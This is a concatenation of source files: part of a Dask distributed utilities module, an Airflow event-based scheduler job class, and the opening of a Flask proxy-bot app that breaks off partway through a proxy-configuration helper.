single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"port_start={port_start} and port_stop={port_stop}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for newline-delimited string of log entries"""
def _repr_html_(self):
return get_template("log.html.j2").render(log=self)
class Logs(dict):
"""A container for a dict mapping names to strings of log entries"""
def _repr_html_(self):
return get_template("logs.html.j2").render(logs=self)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (i.e., arguments that
are not part of Worker class), such as nprocs from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
from dask.utils import typename
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
f"Class {typename(cls)} does not support keyword {k}"
)
else:
raise ValueError(
f"Module {typename(cmd)} does not support keyword {k}"
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
(["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()), []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
# Retain context vars while deserializing; see https://bugs.python.org/issue34014
context = contextvars.copy_context()
return await loop.run_in_executor(
_offload_executor, lambda: context.run(fn, *args, **kwargs)
)
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> list[dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
_deprecations = {
"deserialize_for_cli": "dask.config.deserialize",
"serialize_for_cli": "dask.config.serialize",
"format_bytes": "dask.utils.format_bytes",
"format_time": "dask.utils.format_time",
"funcname": "dask.utils.funcname",
"parse_bytes": "dask.utils.parse_bytes",
"parse_timedelta": "dask.utils.parse_timedelta",
"typename": "dask.utils.typename",
"tmpfile": "dask.utils.tmpfile",
}
def __getattr__(name):
if name in _deprecations:
use_instead = _deprecations[name]
warnings.warn(
f"{name} is deprecated and will be removed in a future release. "
f"Please use {use_instead} instead.",
category=FutureWarning,
stacklevel=2,
)
return import_term(use_instead)
else:
raise AttributeError(f"module {__name__} has no attribute {name}")
if TYPE_CHECKING:
class SupportsToDict(Protocol):
def _to_dict(
self, *, exclude: Container[str] | None = None, **kwargs
) -> dict[str, AnyType]:
...
@overload
def recursive_to_dict(
obj: SupportsToDict, exclude: Container[str] = None, seen: set[AnyType] = None
) -> dict[str, AnyType]:
...
@overload
def recursive_to_dict(
obj: Sequence, exclude: Container[str] = None, seen: set[AnyType] = None
) -> Sequence:
...
@overload
def recursive_to_dict(
obj: dict, exclude: Container[str] = None, seen: set[AnyType] = None
) -> dict:
...
@overload
def recursive_to_dict(
obj: None, exclude: Container[str] = None, seen: set[AnyType] = None
) -> None:
...
def recursive_to_dict(obj, exclude=None, seen=None):
"""
This is for debugging purposes only and calls ``_to_dict`` methods on ``obj`` or
it's elements recursively, if available. The output of this function is
intended to be json serializable.
Parameters
----------
exclude:
A list of attribute names to be excluded from the dump.
This will be forwarded to the objects ``_to_dict`` methods and these methods
are required to ensure this.
seen:
Used internally to avoid infinite recursion. If an object has already
been encountered, it's representation will be generated instead of its
``_to_dict``. This is necessary since we have multiple cyclic referencing
data structures.
"""
if obj is None:
return None
if isinstance(obj, str):
return obj
if seen is None:
seen = set()
if id(obj) in seen:
return repr(obj)
seen.add(id(obj))
if isinstance(obj, type):
return repr(obj)
if hasattr(obj, "_to_dict"):
return obj._to_dict(exclude=exclude)
if isinstance(obj, (deque, set)):
obj = tuple(obj)
if isinstance(obj, (list, tuple)):
return tuple(
recursive_to_dict(
el,
exclude=exclude,
seen=seen,
)
for el in obj
)
elif isinstance(obj, dict):
res = {}
for k, v in obj.items():
k = recursive_to_dict(k, exclude=exclude, seen=seen)
try:
hash(k)
except TypeError:
k = str(k)
v = recursive_to_dict(v, exclude=exclude, seen=seen)
res[k] = v
return res
else:
return repr(obj)
|
event_based_scheduler_job.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import sched
import signal
import sys
import threading
import time
import faulthandler
from typing import Callable, List, Optional
from airflow.contrib.jobs.periodic_manager import PeriodicManager
from airflow.exceptions import SerializedDagNotFound, AirflowException
from airflow.models.dagcode import DagCode
from airflow.models.message import IdentifiedMessage, MessageState
from sqlalchemy import func, not_, or_, asc
from sqlalchemy.orm import selectinload
from sqlalchemy.orm.session import Session
from airflow import models, settings
from airflow.configuration import conf
from airflow.executors.base_executor import BaseExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DagModel
from airflow.models.dag import DagEventDependencies, DAG
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.eventhandler import EventKey
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import TaskInstanceKey
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
from airflow.utils.mailbox import Mailbox
from airflow.events.scheduler_events import (
StopSchedulerEvent, TaskSchedulingEvent, DagExecutableEvent, TaskStateChangedEvent, EventHandleEvent, RequestEvent,
ResponseEvent, StopDagEvent, ParseDagRequestEvent, ParseDagResponseEvent, SchedulerInnerEventUtil,
BaseUserDefineMessage, UserDefineMessageType, SCHEDULER_NAMESPACE, DagRunFinishedEvent, PeriodicEvent)
from notification_service.base_notification import BaseEvent
from notification_service.client import EventWatcher, NotificationClient
from airflow.contrib.jobs.dag_trigger import DagTrigger
from airflow.contrib.jobs.dagrun_event_manager import DagRunEventManager, DagRunId
from airflow.executors.scheduling_action import SchedulingAction
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
MSG = models.Message
class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.server_uri = server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
self._schedule_task(event)
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.run_id).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._remove_periodic_events(event.run_id)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(run_id=event.run_id)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_identified_message(msg)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, run_id, dag):
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {}'.format(run_id, task.task_id))
self.periodic_manager.add_task(run_id=run_id,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
@provide_session
def _remove_periodic_events(self, run_id, session=None):
dagruns = DagRun.find(run_id=run_id)
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {}'.format(run_id, task.task_id))
self.periodic_manager.remove_task(run_id, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.run_id, dag)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = set()
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
affect_dags.add(dag.dag_id)
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs:
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.info(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
return None
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(or_(DR.run_id.is_(None), DR.run_type != DagRunType.BACKFILL_JOB))
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL)
if not dagrun:
self.log.error("Failed to create dag_run.")
# TODO Need to add ret_code and errro_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
except Exception:
self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session)\
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(run_id=dag_run.run_id).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
2. todo check other scheduler failed
3. todo timeout dagrun
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
server_uri=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_service_uri=server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_server_uri(server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.scheduler.id = self.id
self._start_listen_events()
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.executor.start()
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
self.scheduler.recover(self.last_scheduling_id)
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
self.scheduler.stop_timer()
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=int(time.time() * 1000),
version=None
)
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
|
app.py
|
import versionCheck
#^This fixes a really common problem I'm getting messages about. It checks for python 2.x
from flask import Flask, render_template, request, url_for, redirect, Markup, jsonify, make_response, send_from_directory, session
import requests
import sys
import bs4
import RandomHeaders
import re
import urllib
import threading
import time
import main
import csv
from time import gmtime, strftime
app = Flask(__name__, static_url_path='/static')
# Sets the static folder
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
# Flask settings
PROXIES = []
# Defines initial proxy list
sessionInfo = {}
# Info about this specific browser session
bot = main.bot([])
#bot is initated with a LIST of STRINGS for proxies... not dicts
TEST_URL = 'http://www.adidas.com/'
# For the proxy test
@app.after_request
# No caching at all for API endpoints.
def add_header(r):
"""
Add headers to both force latest IE rendering engine or Chrome Frame,
and also to cache the rendered page for 10 minutes.
"""
r.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
r.headers["Pragma"] = "no-cache"
r.headers["Expires"] = "0"
r.headers['Cache-Control'] = 'public, max-age=0'
return r
def configure_proxy_settings(ip, port, username=None, password=None):
"""
Configuring proxies to pass to request
:param ip: The IP address of the proxy you want to connect to ie 127.0.0.1
:param port: The port number of the prxy server you are connecting to
:param username: The username if requred authentication, need to be accompanied with a `password`.
Will default to None to None if not provided
:param password: The password if required for authentication. Needs to be accompanied by a `username`
Will default to None if not provided
:return: A dictionary of proxy settings
"""
proxies = None
